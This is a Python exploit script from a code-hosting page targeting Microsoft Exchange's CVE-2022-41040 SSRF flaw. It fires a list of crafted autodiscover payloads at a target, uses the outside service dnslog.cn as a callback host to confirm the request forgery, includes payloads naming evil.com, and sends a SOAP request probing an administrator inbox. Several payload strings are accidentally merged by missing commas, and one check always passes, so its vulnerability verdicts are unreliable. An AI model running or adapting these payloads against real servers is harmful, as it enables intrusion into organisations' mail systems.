-
Notifications
You must be signed in to change notification settings - Fork 0
/
cve-41040-exp.py
125 lines (102 loc) · 7.86 KB
/
cve-41040-exp.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
import requests
import subprocess
import re
class Dnslog():
def __init__(self):
self.s = requests.session()
req = self.s.get("http://www.dnslog.cn/getdomain.php", timeout=30)
self.domain = req.text
def pull_logs(self):
req = self.s.get("http://www.dnslog.cn/getrecords.php", timeout=30)
return req.json()
def getInfo(url: str):
headers = {
'Content-Type': 'text/xml',
'Accept-Encoding': 'gzip, deflate',
'Connection': 'close',
}
data = '<?xml version=\'1.0\' encoding=\'utf-8\'?>\\x0d\\x0a <soap:Envelope\\x0d\\x0a xmlns:soap=\'http://schemas.xmlsoap.org/soap/envelope/\'\\x0d\\x0a xmlns:t=\'http://schemas.microsoft.com/exchange/services/2006/types\'\\x0d\\x0a xmlns:m=\'http://schemas.microsoft.com/exchange/services/2006/messages\'\\x0d\\x0a xmlns:xsi=\'http://www.w3.org/2001/XMLSchema-instance\'>\\x0d\\x0a <soap:Header>\\x0d\\x0a <t:RequestServerVersion Version=\\"Exchange2016\\" />\\x0d\\x0a </soap:Header>\\x0d\\x0a <soap:Body>\\x0d\\x0a <m:FindItem Traversal=\'Shallow\'>\\x0d\\x0a <m:ItemShape>\\x0d\\x0a <t:BaseShape>AllProperties</t:BaseShape>\\x0d\\x0a </m:ItemShape>\\x0d\\x0a <m:ParentFolderIds>\\x0d\\x0a <t:DistinguishedFolderId Id=\'inbox\'>\\x0d\\x0a <t:Mailbox>\\x0d\\x0a <t:EmailAddress>administrator@example.local</t:EmailAddress>\\x0d\\x0a </t:Mailbox>\\x0d\\x0a </t:DistinguishedFolderId>\\x0d\\x0a </m:ParentFolderIds>\\x0d\\x0a </m:FindItem>\\x0d\\x0a </soap:Body>\\x0d\\x0a </soap:Envelope>'
header_field = {'computerName': 'X-FEServer',
'backendname': 'X-CalculatedBETarget',
'Application': 'X-ServerApplication'}
try:
response = requests.post(f'{url}/mapi/nspi', headers=headers, data=data, verify=False)
print('Get some info about your target...')
for k, v in header_field.items():
try:
print(k + ": " + response.headers[v], 'good')
except Exception as ee:
print(str(ee), 'error')
continue
except Exception as e:
print(str(e), 'error')
def run(sURL,domain):
print(f"Target URL: {sURL}")
print(f"IPv4 look up to domain: {domain}", 'good')
headers = {
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:86.0) Gecko/20100101 Firefox/86.0 pp9520',
'Accept': '*/*',
'Accept-Language': 'en',
'Accept-Encoding': 'gzip, deflate',
'Connection': 'close'
}
# for dns checking
dns_callback = Dnslog()
dns_callback_host = dns_callback.domain
print(f"The test DNS server is '{dns_callback_host}'")
payload_list = [
f'/autodiscover/autodiscover.json/v1.0/aa@{dns_callback_host}?Protocol=Autodiscoverv1',
f'/autodiscover/autodiscover.json/v1.0/aa..{dns_callback_host}/owa/?&Email=autodiscover/autodiscover.json?a..{dns_callback_host}&Protocol=Autodiscoverv1&Protocol=Powershell',
f'/autodiscover/autodiscover.json/v1.0/aa@{dns_callback_host}/owa/?&Email=autodiscover/autodiscover.json?a@{dns_callback_host}&Protocol=Autodiscoverv1&Protocol=Powershell',
f'/autodiscover/autodiscover.json?aa..{dns_callback_host}/owa/?&Email=autodiscover/autodiscover.json?a..{dns_callback_host}&Protocol=Autodiscoverv1&{dns_callback_host}Protocol=Powershell',
f'/autodiscover/autodiscover.json?aa@{dns_callback_host}/owa/?&Email=autodiscover/autodiscover.json?a@{dns_callback_host}&Protocol=Autodiscoverv1&{dns_callback_host}Protocol=Powershell',
f'/autodiscover/autodiscover.json?aa..{dns_callback_host}/owa/?&Email=aa@autodiscover/autodiscover.json?a..{dns_callback_host}&Protocol=Autodiscoverv1&{dns_callback_host}Protocol=Powershell',
f'/autodiscover/autodiscover.json?aa@{dns_callback_host}/owa/?&Email=aa@autodiscover/autodiscover.json?a@{dns_callback_host}&Protocol=Autodiscoverv1&{dns_callback_host}Protocol=Powershell',
f'/autodiscover/autodiscover.json?aa..{dns_callback_host}/owa/?&Email=aa@autodiscover/autodiscover.json?a..{dns_callback_host}&Protocol=Autodiscoverv1&{dns_callback_host}Protocol=Powershell',
f'/autodiscover/autodiscover.json/v1.0/aa@autodiscover/autodiscover.json?a..@{dns_callback_host}&Protocol=Autodiscoverv1&Protocol=Powershell',
"/autodiscover/autodiscover.json?@URL/&Email=autodiscover/autodiscover.json%3f@URL",
f"/autodiscover/autodiscover.json?@{domain}/&Email=autodiscover/autodiscover.json%3f@{domain}",
f"/autodiscover/autodiscover.json?@evil.com/Powershell?=Email=autodiscover/autodiscover.json%3f@evil.com"
f"/autodiscover/autodiscover.json?@{dns_callback_host}/&Email=autodiscover/autodiscover.json%3f@{dns_callback_host}",
f"/autodiscover/autodiscover.json?@{domain}.v1.{dns_callback_host}/&Email=autodiscover/autodiscover.json%3f@{domain}.v1.{dns_callback_host}",
f"/autodiscover/autodiscover.json/v1.0/aa@{domain}.v2.{dns_callback_host}?Protocol=Autodiscoverv1",
f"/autodiscover/autodiscover.json/v1.0/aa..@{domain}.v3.{dns_callback_host}/owa/?&Email=autodiscover/autodiscover.json?a..@{domain}.v3.{dns_callback_host}&Protocol=Autodiscoverv1&Protocol=Powershell",
f"/autodiscover/autodiscover.json/v1.0/aa@{domain}.v4.{dns_callback_host}/owa/?&Email=autodiscover/autodiscover.json?a@{domain}.v4.{dns_callback_host}&Protocol=Autodiscoverv1&Protocol=Powershell",
f"/autodiscover/autodiscover.json?aa..{domain}.v5.{dns_callback_host}/owa/?&Email=autodiscover/autodiscover.json?a..{domain}.v5.{dns_callback_host}&Protocol=Autodiscoverv1&{domain}.v5.{dns_callback_host}Protocol=Powershell",
f"/autodiscover/autodiscover.json?aa@{domain}.v6.{dns_callback_host}/owa/?&Email=autodiscover/autodiscover.json?a@{domain}.v6.{dns_callback_host}&Protocol=Autodiscoverv1&{domain}.v6.{dns_callback_host}Protocol=Powershell",
f"/autodiscover/autodiscover.json?aa..{domain}.v7.{dns_callback_host}/owa/?&Email=aa@autodiscover/autodiscover.json?a..{domain}.v7.{dns_callback_host}&Protocol=Autodiscoverv1&{domain}.v7.{dns_callback_host}Protocol=Powershell",
f"/autodiscover/autodiscover.json?aa@{domain}.v8.{dns_callback_host}/owa/?&Email=aa@autodiscover/autodiscover.json?a@{domain}.v8.{dns_callback_host}&Protocol=Autodiscoverv1&{domain}.v8.{dns_callback_host}Protocol=Powershell",
f"/autodiscover/autodiscover.json/v1.0/aa@autodiscover/autodiscover.json?a..@{domain}.v9.{dns_callback_host}&Protocol=Autodiscoverv1&Protocol=Powershell"
"/autodiscover/autodiscover.json?a@foo.var/owa/&Email=autodiscover/autodiscover.json?a@foo.var&Protocol=XYZ&FooProtocol=Powershell"
"/autodiscover/autodiscover.json?@1337.com/owa/?&Email=autodiscover/autodiscover.json%3F@1337.com"
]
for payload in payload_list:
url = sURL + payload
try:
req = requests.get(url, headers=headers, verify=False)
print(req.text)
if req.status_code == 200 or req.status_code == 302:
print(f"GET request '{url}' success", 'good')
else:
print(f"GET request '{url}' failed", 'error')
continue
records = dns_callback.pull_logs()
if len(records) == 0:
pass
else:
print(f"The target {sURL} seems to be vuln by CVE-2022-41040", "good")
print(f"payload: {payload}", 'good')
break
if (dns_callback_host in req.headers) or (req.status_code == 200, 302) or ("IIS Web Core" in req.text) or ('X-FEServer' in req.headers):
print('This site is vulnerable to SSRF Check your collabrator client.', 'good')
break
else:
print('It seems not vulnerable, but check your collabrator client!', 'error')
except Exception as e:
print(str(e), 'error')
else:
print(f"The target seems NOT vuln by CVE-2022-41040", "error")
exit()
getInfo(sURL)
if __name__ == '__main__':
run("https://test.com","test.com")